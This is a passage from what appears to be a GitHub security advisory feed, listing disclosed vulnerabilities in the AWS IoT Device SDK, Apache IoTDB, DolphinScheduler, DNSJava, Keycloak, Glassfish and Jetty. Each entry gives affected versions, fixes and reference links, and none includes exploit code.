<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:tsfile] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-server] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:flink-tsfile-connector] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.dolphinscheduler:dolphinscheduler-api] Incorrect Default Permissions in Apache DolphinScheduler</title>
<description><p>Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another users password through the API interface.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-13922">https://nvd.nist.gov/vuln/detail/CVE-2020-13922</a></li>
<li><a href="https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1">https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1</a></li>
<li><a href="https://www.mail-archive.com/announce@apache.org/msg06076.html">https://www.mail-archive.com/announce@apache.org/msg06076.html</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml</a></li>
<li><a href="https://www.mail-archive.com/announce%40apache.org/msg06076.html">https://www.mail-archive.com/announce%40apache.org/msg06076.html</a></li>
<li><a href="https://github.com/advisories/GHSA-qhh5-9738-g9mx">https://github.com/advisories/GHSA-qhh5-9738-g9mx</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qhh5-9738-g9mx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qhh5-9738-g9mx</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-grafana-connector] Apache IoTDB Grafana Connector vulnerable to Improper Authentication</title>
<description><p>Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects Apache IoTDB Grafana Connector from 0.13.0 through 0.13.3.</p>
<p>Attackers could log in without authorization. This is fixed in 0.13.4.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-24831">https://nvd.nist.gov/vuln/detail/CVE-2023-24831</a></li>
<li><a href="https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l">https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-pvjv-386f-c8wh">https://github.com/advisories/GHSA-pvjv-386f-c8wh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvjv-386f-c8wh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvjv-386f-c8wh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability. </p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability. </p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.edc:transfer-data-plane] Eclipse Dataspace Components's ConsumerPullTransferTokenValidationApiController doesn't check for token validit</title>
<description><p>In Eclipse Dataspace Components, from version 0.5.0 and before version 0.9.0, the ConsumerPullTransferTokenValidationApiController does not check for token validity (expiry, not-before, issuance date), which can allow an attacker to bypass the check for token expiration. The issue requires to have a dataplane configured to support http proxy consumer pull AND include the module "transfer-data-plane". The affected code was marked deprecated from the version 0.6.0 in favour of Dataplane Signaling. In 0.9.0 the vulnerable code has been removed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8642">https://nvd.nist.gov/vuln/detail/CVE-2024-8642</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6">https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0">https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/28">https://gitlab.eclipse.org/security/cve-assignement/-/issues/28</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java">https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java</a></li>
<li><a href="https://github.com/advisories/GHSA-8259-2x72-2gvc">https://github.com/advisories/GHSA-8259-2x72-2gvc</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8259-2x72-2gvc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8259-2x72-2gvc</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.glassfish.main.web:web-core] Eclipse Glassfish URL redirection vulnerability</title>
<description><p>In Eclipse Glassfish versions prior to 7.0.10, a URL redirection vulnerability to untrusted sites existed.
This vulnerability is caused by the vulnerability (CVE-2023-41080) in the Apache code included in GlassFish.
This vulnerability only affects applications that are explicitly deployed to the root context ('/').</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8646">https://nvd.nist.gov/vuln/detail/CVE-2024-8646</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/pull/24655">https://github.com/eclipse-ee4j/glassfish/pull/24655</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/34">https://gitlab.eclipse.org/security/cve-assignement/-/issues/34</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163</a></li>
<li><a href="https://glassfish.org/download">https://glassfish.org/download</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145">https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145</a></li>
<li><a href="https://github.com/advisories/GHSA-7gq2-vwq9-w8vw">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.keycloak:keycloak-core] Keycloak Denial of Service vulnerability</title>
<description><p>A denial of service vulnerability was found in keycloak where the amount of attributes per object is not limited,an attacker by sending repeated HTTP requests could cause a resource exhaustion when the application send back rows with long attribute values.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-6841">https://nvd.nist.gov/vuln/detail/CVE-2023-6841</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2023-6841">https://access.redhat.com/security/cve/CVE-2023-6841</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2254714">https://bugzilla.redhat.com/show_bug.cgi?id=2254714</a></li>
<li><a href="https://github.com/advisories/GHSA-w97f-w3hq-36g2">https://github.com/advisories/GHSA-w97f-w3hq-36g2</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-w97f-w3hq-36g2</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-w97f-w3hq-36g2</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-xml] Eclipse Jetty XmlParser allows arbitrary DOCTYPE declarations</title>
<description><h3 id="from-the-reporter">From the reporter</h3>
<blockquote>
<p><code>XmlParser</code> is vulnerable to XML external entity (XXE) vulnerability.
XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit
this vulnerability in order to achieve SSRF or cause a denial of service.
One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the
WAR includes a malicious web.xml.</p>
</blockquote>
<h3 id="impact">Impact</h3>
<p>There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e. in order to exploit <code>XmlParser</code> the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against malicious web application and potentially hostile web applications should only be run on an isolated virtualisation. </p>
<p>Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the jetty XmlParser is equally vulnerable as a direct usage of the JVM supplied SAX parser. No CVE will be allocated to this advisory.</p>
<p>However, any direct usage of the <code>XmlParser</code> class by an application may be vulnerable. The impact would greatly depend on how the application uses <code>XmlParser</code>, but it could be a denial of service due to large entity expansion, or possibly the revealing local files if the XML results are accessible remotely.</p>
<h3 id="patches">Patches</h3>
<p>Ability to configure the SAXParserFactory to fit the needs of your particular XML parser implementation have been merged as part of PR #10067</p>
<h3 id="workarounds">Workarounds</h3>
<p>Don't use <code>XmlParser</code> to parse data from users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/10067">https://github.com/eclipse/jetty.project/pull/10067</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0">https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823">https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823</a></li>
<li><a href="https://github.com/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-58qw-p7qm-5rvh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-openid] Jetty's OpenId Revoked authentication allows one request</title>
<description><p>If a Jetty <code>OpenIdAuthenticator</code> uses the optional nested <code>LoginService</code>, and that <code>LoginService</code> decides to revoke an already authenticated user, then the current request will still treat the user as authenticated. The authentication is then cleared from the session and subsequent requests will not be treated as authenticated. </p>
<p>So a request on a previously authenticated session could be allowed to bypass authentication after it had been rejected by the <code>LoginService</code>.</p>
<h3 id="impact">Impact</h3>
<p>This impacts usages of the jetty-openid which have configured a nested <code>LoginService</code> and where that <code>LoginService</code> will is capable of rejecting previously authenticated users.</p>
<h3 id="original-report">Original Report</h3>
<blockquote>
<p>working on a custom OpenIdAuthenticator, I discovered the following:</p>
<p><a href="https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505">https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505</a></p>
<p>In the case where the LoginService does return that the authentication has been revoked (from the validate() call on line 463), the OpenIdAuthenticator removes the authentication from the session; however the current request still proceeds as if authenticated, since it falls through to "return authentication" on line 505.</p>
<p>This is fixed by moving the line 505 (and associated debug log) inside the else block that ends on line 502, instead of outside it. Then the revocation case will run through to line 517 and will trigger a new OpenId authentication which I think is correct.</p>
<p>I think this revocation can only occur if you do attach a separate LoginService to the OpenIdLoginService, but in that case the revoked authentication will still let the next request through (and possibly more than one if they are very close to simultaneous).</p>
<p>Technically I think this is a security vulnerability, if a very minor one, so I'm sending this off-list.</p>
</blockquote>
<h3 id="patched-versions">Patched Versions</h3>
<p>Fixed in Jetty Versions:</p>
<ul>
<li>9.4.52 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li>10.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>11.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>12.0.0 - not impacted (already has fix)</li>
</ul>
<h3 id="workaround">Workaround</h3>
<p>Upgrade your version of Jetty.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
